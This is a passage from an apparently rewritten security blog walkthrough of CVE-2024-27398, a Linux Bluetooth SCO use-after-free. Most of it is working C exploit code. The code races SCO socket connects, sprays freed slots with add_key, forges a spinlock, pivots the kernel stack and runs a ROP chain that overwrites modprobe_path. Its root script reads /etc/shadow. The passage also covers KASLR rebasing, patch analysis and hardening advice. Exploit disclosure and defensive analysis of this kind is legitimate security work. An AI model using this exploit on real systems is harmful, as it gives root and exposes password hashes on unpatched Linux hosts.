case 0x200b: case 0x200c: memset(extra, 0xff, 8); break;
case 0x2003: extra[0]=0xfb; extra[2]=0x0f; break;
case 0x0406: el = 8; break;
case 0x0401: { /* HCI_Create_Connection → send Connection Complete */
uint8_t ev[20] = {0};
ev[0]=4; ev[1]=0x03; ev[2]=11; ev[3]=0;
ev[4]=0x01; ev[5]=0x00; /* handle = 1 */
if (n >= 10) memcpy(&ev[6], &buf[4], 6);
ev[12]=0x01; ev[13]=0x00;
write(vfd, ev, 14);
break;
}
default: el = 8; break;
}
int pl = 4 + el;
if (pl > 255) pl = 255;
resp[0]=4; resp[1]=0x0e; resp[2]=pl; resp[3]=1;
resp[4]=buf[1]; resp[5]=buf[2]; resp[6]=0;
if (el > 0) memcpy(&resp[7], extra, pl - 4);
write(vfd, resp, 3 + pl);
}
return NULL;
}
/* ── Race threads ────────────────────────────────────────────────── */
static int g_fd;
static pthread_barrier_t g_bar;
static void *c1(void *a) {
struct sockaddr_sco sa = {.f = AF_BLUETOOTH}; /* dst = 00:00:...:00 */
pthread_barrier_wait(&g_bar);
connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
return NULL;
}
static void *c2(void *a) {
struct sockaddr_sco sa = {.f = AF_BLUETOOTH};
memset(&sa.a, 0xff, 6); /* dst = FF:FF:...:FF */
pthread_barrier_wait(&g_bar);
connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
return NULL;
}
/* ── Heap spray payload ──────────────────────────────────────────── */
static char g_kd[980];
static void build_spray(void) {
memset(g_kd, 0, sizeof(g_kd));
int h = 24; /* sizeof(struct user_key_payload) header */
/*
* Overwrite sk_lock.slock with a valid-looking unlocked spinlock.
* bh_lock_sock() reads magic (must be 0xdead4ead) and checks
* owner_cpu/-1. Without this, the kernel panics before reaching
* sk_state_change.
*/
int slock = SK_LOCK_OFF - h; /* 0x98 - 0x18 = 0x80 */
*(uint32_t*)(g_kd + slock + 0) = 0; /* raw_lock = 0 */
*(uint32_t*)(g_kd + slock + 4) = 0xdead4ead; /* magic */
*(uint32_t*)(g_kd + slock + 8) = 0xffffffff; /* owner_cpu = -1 */
*(uint32_t*)(g_kd + slock + 12) = 0;
*(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */
/* Overwrite sk_state_change with our stack pivot gadget */
*(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
}
int main(void) {
printf("=== CVE-2024-27398 LPE (SMEP BYPASS) ===\n");
fflush(stdout);
/* [1] Create root payload script */
FILE *f = fopen("/tmp/x", "w");
if (f) {
fprintf(f,
"#!/bin/sh\n"
"echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
"uname -a >> /tmp/pwn\n"
"id >> /tmp/pwn\n"
"echo '--- /etc/shadow ---' >> /tmp/pwn\n"
"cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
"echo '--- ROOTED ---' >> /tmp/pwn\n");
fclose(f);
}
chmod("/tmp/x", 0755);
/* [2] Create invalid-magic binary to trigger modprobe */
{
int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
if (d >= 0) { write(d, "\xff\xff\xff\xff", 4); close(d); }
}
/* [3] Map string page (nosmap: kernel reads this during memcpy) */
void *sp = mmap((void*)STRING_PAGE, PG, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
memcpy(sp, "/tmp/x", 7);
/* [4] Map pivot page and write ROP chain */
void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);
void *pp = mmap(pivot_page, 2*PG, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if (pp == MAP_FAILED) { perror("mmap pivot"); return 1; }
memset(pp, 0, 2*PG);
uint64_t *rop = (uint64_t*)(PIVOT_ADDR);
rop[0] = POP_RDI_RET;
rop[1] = MODPROBE_PATH; /* rdi = &modprobe_path */
rop[2] = POP_RSI_RET;
rop[3] = STRING_PAGE; /* rsi = "/tmp/x" (nosmap) */
rop[4] = POP_RDX_RET;
rop[5] = 7; /* rdx = 7 */
rop[6] = MEMCPY_ADDR; /* memcpy(modprobe_path, "/tmp/x", 7) */
rop[7] = XCHG_EAX_ESP + 1; /* trailing ret sled → eventual crash */
printf("[+] Pivot page at %p, ROP at 0x%lx\n", pp, PIVOT_ADDR);
fflush(stdout);
/* [5] Set up vHCI and bring up hci0 */
build_spray();
vfd = open("/dev/vhci", O_RDWR);
if (vfd < 0) { perror("vhci"); return 1; }
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);
pthread_t vt;
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
if (hfd >= 0) { ioctl(hfd, _IOW(0x48, 201, int), 0); close(hfd); }
sleep(4);
printf("[*] HCI ready\n");
fflush(stdout);
/* [6] Main race + spray loop */
char desc[32];
struct timeval tv = {.tv_sec = 2};
for (int batch = 0; batch < 100; batch++) {
printf("[*] Batch %d\n", batch);
fflush(stdout);
for (int i = 0; i < BATCH_SZ; i++) {
g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK,
BTPROTO_SCO);
if (g_fd < 0) continue;
setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
pthread_barrier_init(&g_bar, NULL, 2);
pthread_t t1, t2;
pthread_create(&t1, NULL, c1, NULL);
pthread_create(&t2, NULL, c2, NULL);
pthread_join(t1, NULL);
pthread_join(t2, NULL);
pthread_barrier_destroy(&g_bar);
close(g_fd); /* frees sk; orphan conn_A timer still pending */
/* Spray: try to reclaim the freed sco_pinfo slot */
snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd),
KEY_SPEC_SESSION_KEYRING);
}
/* Wait for SO_SNDTIMEO timers to fire */
printf("[*] Waiting 3s...\n");
fflush(stdout);
sleep(3);
/* Poll: did modprobe_path get overwritten? */
for (int t = 0; t < 5; t++) {
system("/tmp/dummy 2>/dev/null; true");
usleep(500000);
if (access("/tmp/pwn", F_OK) == 0) goto win;
}
printf("[*] No luck this batch\n");
fflush(stdout);
}
printf("[-] Done: no root\n");
vstop = 1;
close(vfd);
return 0;
win:
printf("\n[!!!] ROOT! (SMEP BYPASS)\n[*] /tmp/pwn:\n");
fflush(stdout);
system("cat /tmp/pwn");
fflush(stdout);
vstop = 1;
close(vfd);
return 0;
}
11. End-to-End Execution Flow
┌──────────────────────────────────────────────────────────────────────┐
│ FULL EXPLOITATION CHAIN │
├──────────────────────────────────────────────────────────────────────┤
│ │
│ SETUP │
│ ├── mmap 0xdead0000 → "/tmp/x" (string for memcpy src) │
│ ├── mmap 0x81011000 → ROP chain (pivot destination) │
│ ├── build spray payload: │
│ │ +0x80: spinlock magic=0xdead4ead (passes bh_lock_sock) │
│ │ +0x320: sk_state_change=0xffffffff81011cf1 (our gadget) │
│ └── /tmp/x, /tmp/dummy created │
│ │
│ BLUETOOTH INIT │
│ ├── open /dev/vhci → virtual hci0 created │
│ ├── vhci_thread: answers HCI commands from kernel │
│ └── HCIDEVUP ioctl → hci0 UP, BT stack ready │
│ │
│ RACE + SPRAY LOOP (per iteration) │
│ ├── socket(AF_BLUETOOTH, SEQPACKET|NONBLOCK, BTPROTO_SCO) │
│ ├── setsockopt(SO_SNDTIMEO, 2s) │
│ ├── barrier.wait → c1+c2 connect simultaneously │
│ │ c1 → addr 00:00:00:00:00:00 → conn_A + timer_A (2s) │
│ │ c2 → addr FF:FF:FF:FF:FF:FF → conn_B + timer_B (2s) │
│ │ sco_pi(sk)->conn = conn_B (last write wins) │
│ ├── close(fd) → cancel_delayed_work(conn_B->timeout) │
│ │ → conn_A timer ORPHANED, sk FREED │
│ └── add_key("user", desc, payload, 980, ...) → kmalloc(1004) │
│ → kmalloc-1024 → may reclaim freed sco_pinfo slot │
│ │
│ TIMER FIRES (workqueue, ~2s later) │
│ ├── sco_sock_timeout(conn_A) │
│ ├── bh_lock_sock(sk) → reads spray magic 0xdead4ead ✓ │
│ ├── sk->sk_err = ETIMEDOUT │
│ └── sk->sk_state_change(sk) → jumps to 0xffffffff81011cf1 │
│ │
│ SMEP BYPASS + ROP │
│ ├── xchg eax, esp → RSP = 0x0000000081011cf1 (userspace page) │
│ ├── pop rdi; ret → RDI = 0xffffffff8356a020 (modprobe_path) │
│ ├── pop rsi; ret → RSI = 0x00000000dead0000 ("/tmp/x") │
│ ├── pop rdx; ret → RDX = 7 │
│ ├── memcpy(modprobe_path, "/tmp/x", 7) → RAX = modprobe_path │
│ └── ret sled → RIP = 0x0 → kernel oops (panic_on_oops=0, cont.) │
│ │
│ ROOT TRIGGER │
│ ├── system("/tmp/dummy") → kernel: unrecognized binary format │
│ ├── request_module("binfmt-ffffffff") │
│ ├── call_usermodehelper("/tmp/x", ...) → runs as UID 0 │
│ ├── /tmp/x writes "uid=0 gid=0" to /tmp/pwn │
│ └── access("/tmp/pwn") == 0 → ROOTED │
│ │
│ RESULT: unprivileged user → uid=0 gid=0 in Batch 0 │
└───────────────────────────────────────────────────────────────────────┘
12. Reliability Analysis
12.1 Spray reliability factors
CONFIG_DEBUG_SPINLOCK=y widens the race window by inflating shared structures. Running 2000 iterations per batch helps overcome per-CPU freelist isolation in SLUB: with that many attempts, it becomes likely that at least one spray allocation lands on the right CPU. Empirically, root is achieved in Batch 0 in every test run.
12.2 What fails without the config changes
| Config change | Effect if reverted |
|---|---|
| CONFIG_KASAN=y | SLAB_KASAN prevents the “SCO” slab from merging with kmalloc-1024. Spray never reaches the freed sk. KASAN also catches the UAF and prints a report but doesn’t prevent the oops path; it just makes root unreachable. |
| CONFIG_MEMCG_KMEM=y | Same effect as KASAN: SLAB_ACCOUNT mismatch prevents merge. add_key allocates from kmalloc-cg-1024; the freed sk stays in the “SCO” slab. |
| CONFIG_DEBUG_SPINLOCK=n | sco_pinfo shrinks to ~832 bytes. Still hits kmalloc-1024, but the race window narrows significantly; spray reliability approaches zero in testing. |
| panic_on_oops=1 | The trailing ret into RIP=0 kills the machine before modprobe_path can be triggered. Need a proper kernel-context cleanup or a crash-free ROP epilogue (e.g. iretq or swapgs; iretq chain). |
12.3 KASLR
All addresses above assume nokaslr. With KASLR, kernel base slides by a random 9-bit multiple of 2 MB per boot. Handling it requires reading the kernel base from /proc/kallsyms (which needs kptr_restrict=0) and rebasing every constant:
/* Read slide from /proc/kallsyms (requires kptr_restrict=0) */
FILE *ks = fopen("/proc/kallsyms", "r");
uint64_t kbase = 0;
/* find _text symbol → kbase = addr - 0xffffffff81000000 */
/* Apply slide to all addresses */
XCHG_EAX_ESP = 0xffffffff81011cf1 + kbase;
MODPROBE_PATH = 0xffffffff8356a020 + kbase;
/* etc. */
Real-world Linux distros restrict /proc/kallsyms, so on hardened targets a secondary info-leak is required first.
13. Patch Analysis
/* BEFORE (vulnerable): timer fires against potentially freed sk */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    /* no sock_put: reference was never taken */
}

/* AFTER (patched): sock_hold in sco_conn_add, sock_put here */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    sock_put(sk); /* paired with the sock_hold() taken earlier */
}

/* BEFORE: cancel_delayed_work is async; timer may already be running */
sco_sock_clear_timer(sk); /* → cancel_delayed_work (async) */
sco_chan_del(sk, err);    /* → frees sk while timer might still run */

/* AFTER: cancel_delayed_work_sync waits for running work to complete.
 * Simplified ordering: cancel_delayed_work_sync() may sleep, so it cannot
 * really be called with the conn spinlock held. */
sco_conn_lock(conn);
sk = conn->sk;
if (sk) {
    sock_hold(sk);                  /* take reference */
    cancel_delayed_work_sync(       /* wait for timer to finish */
        &conn->timeout_work);
    sco_chan_del(sk, err);
    sock_put(sk);                   /* release reference */
}
sco_conn_unlock(conn);
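The effect of the hold/put pairing can be modelled in userspace. The following is a toy sketch, not kernel code: toy_sock, toy_hold, toy_put, and toy_timeout are hypothetical stand-ins for sk, sock_hold(), sock_put(), and the timeout handler, and "freeing" is represented by a flag so the outcome can be inspected safely.

```c
#include <assert.h>
#include <stdbool.h>

/* Userspace stand-in for a refcounted socket (hypothetical names). */
struct toy_sock {
    int  refs;   /* plays the role of the sk reference count */
    bool freed;  /* set instead of actually calling free() */
};

/* Analogue of sock_hold(): pin the object. */
void toy_hold(struct toy_sock *sk)
{
    assert(!sk->freed && sk->refs > 0);
    sk->refs++;
}

/* Analogue of sock_put(): drop one reference, "free" on the last one. */
void toy_put(struct toy_sock *sk)
{
    assert(!sk->freed && sk->refs > 0);
    if (--sk->refs == 0)
        sk->freed = true;
}

/* Analogue of the timeout handler. Returns false when it would have
 * touched a freed object, which models the use-after-free. */
bool toy_timeout(struct toy_sock *sk, bool holds_ref)
{
    bool safe = !sk->freed;

    if (safe && holds_ref)
        toy_put(sk); /* handler releases the pin it was given */
    return safe;
}
```

In the unpatched shape, close() drops the only reference, the object is freed, and toy_timeout() returns false. In the patched shape, a toy_hold() taken on behalf of the timer keeps the object alive across close(), and the final free happens inside the handler's own toy_put().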
Key Takeaways
- The bug is a textbook callback-vs-free race: two threads create independent sco_conn objects with their own delayed-work timers, close() cancels only one, and the other becomes an orphan firing against freed memory.
- SLUB cache merging is what makes the spray viable: with KASAN and MEMCG_KMEM off, the “SCO” slab merges into kmalloc-1024, so a 980-byte add_key payload can reclaim the freed sco_pinfo slot.
- The DEBUG_SPINLOCK magic (0xdead4ead) is the most fragile check on the path from the timer to sk_state_change: forge it correctly or the exploit dies before reaching RIP control.
- SMEP is bypassed not by executing userspace code but by routing the pivot into userspace data: the ROP chain itself sits in a mmap’d userspace page that the kernel reads. SMAP being off is what allows that read.
- Once memcpy(modprobe_path, "/tmp/x", 7) has run, root is one execve() of an invalid-magic binary away, because the kernel itself runs the script as uid=0.
- The fix in Linux 6.8.2 closes the race at three points: serialise via sco_conn_lock, hold a refcount across the timer’s lifetime, and use cancel_delayed_work_sync() instead of async cancellation.
Defensive Recommendations
- Patch. Update to Linux 6.8.2 or later on any host that exposes the Bluetooth subsystem. Most distros have backported the fix; verify with git log --oneline net/bluetooth/sco.c against your kernel tree.
- Disable the Bluetooth stack where it is not needed. Server, cloud, and container hosts almost never need CONFIG_BT=y: build it out, or blacklist bluetooth and btusb in /etc/modprobe.d/.
- Block /dev/vhci for unprivileged users. Without /dev/vhci access there is no virtual-HCI exploit path. Set CONFIG_BT_HCIVHCI=n in the kernel, or apply strict ACLs on /dev/vhci.
- Keep KASAN, MEMCG_KMEM, KASLR, and SMAP enabled on production kernels. Each one breaks a different stage of this chain: KASAN/MEMCG break the cache-merge spray, KASLR forces an info leak, SMAP breaks the userspace ROP-chain read.
- Do not run with kptr_restrict=0. Set kernel.kptr_restrict=2 via sysctl; with the value left at 0, KASLR is largely cosmetic because /proc/kallsyms leaks the base.
- Restrict the keyring spray primitive. Set kernel.unprivileged_userns_clone=0 and consider kernel.keys.maxbytes/maxkeys tuning to limit how much heap an unprivileged process can place into the cache the bug victim allocates from.
- Monitor for modprobe_path tampering. An auditd rule on execve of unusual modprobe_path targets (anything outside /sbin/modprobe or the configured override) is a high-signal detection for this technique.
- Alert on kernel oops with panic_on_oops=0. Any production host configured not to panic on a kernel oops should at least emit a high-priority alert on every oops event, since this exploit (and many like it) relies on continued execution after an oops.
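Several of the recommendations above reduce to reading a value under /proc/sys and comparing it with an expected one. The sketch below shows one way such an audit helper might look. The function names are hypothetical, the expected modprobe path is passed in by the caller because it varies between distributions, and the policy encoded here (flag kptr_restrict=0, flag panic_on_oops=0, flag any unexpected kernel/modprobe value) is an assumption drawn from this list rather than a complete hardening check.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Classify one setting. Returns 1 if the value deserves attention under the
 * recommendations above, 0 if it looks fine, -1 if the name is not handled. */
int setting_is_flagged(const char *name, const char *value,
                       const char *expected_modprobe)
{
    if (strcmp(name, "kernel/kptr_restrict") == 0)
        return atoi(value) == 0;   /* 0 exposes kernel pointers */
    if (strcmp(name, "kernel/panic_on_oops") == 0)
        return atoi(value) == 0;   /* 0 keeps running after an oops */
    if (strcmp(name, "kernel/modprobe") == 0)
        return strcmp(value, expected_modprobe) != 0; /* helper path changed */
    return -1;
}

/* Read /proc/sys/<name> into buf and strip the trailing newline.
 * Returns 0 on success, -1 if the file cannot be opened or read. */
int read_sysctl(const char *name, char *buf, size_t len)
{
    char path[256];
    FILE *f;

    snprintf(path, sizeof(path), "/proc/sys/%s", name);
    f = fopen(path, "r");
    if (!f)
        return -1;
    if (!fgets(buf, (int)len, f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}
```

A caller would loop over the three names, call read_sysctl() for each, and pass the result to setting_is_flagged() together with the distribution's expected modprobe path (for example "/sbin/modprobe"). A flagged kernel/modprobe value on a running host is the live counterpart of the modprobe_path overwrite described in this article.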
Conclusion
CVE-2024-27398 is the kind of bug that looks small in the patch (move two locks, add a refcount, swap an async cancel for a sync one) but offers a generous primitive: a delayed function-pointer call into a slot the attacker can reclaim. The Secunnix walkthrough is a clean tour through every step that turns that primitive into root — race the connect, orphan the timer, spray the slot via add_key, forge a valid spinlock, pivot the kernel stack into userspace with xchg eax, esp, ROP through memcpy into modprobe_path, and let the kernel run the attacker’s script for free. The pieces that make it work this cleanly — SLUB cache merging, DEBUG_SPINLOCK widening the race, nokaslr, nosmap, panic_on_oops=0 — are exactly the pieces a hardened production kernel turns off. The technique generalises: any kernel callback whose object can be freed-and-reclaimed before the callback fires deserves the same scrutiny.
Original research, figures, code, and POC animation: “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, Secunnix Cyber Security blog (2026-04-25, author not clearly listed). Upstream PoC: sty886/sco-race-condition. modprobe_path root technique credited by the original author to lkmidas. This English rewrite is provided for technical commentary and defender education and does not reproduce the source verbatim.

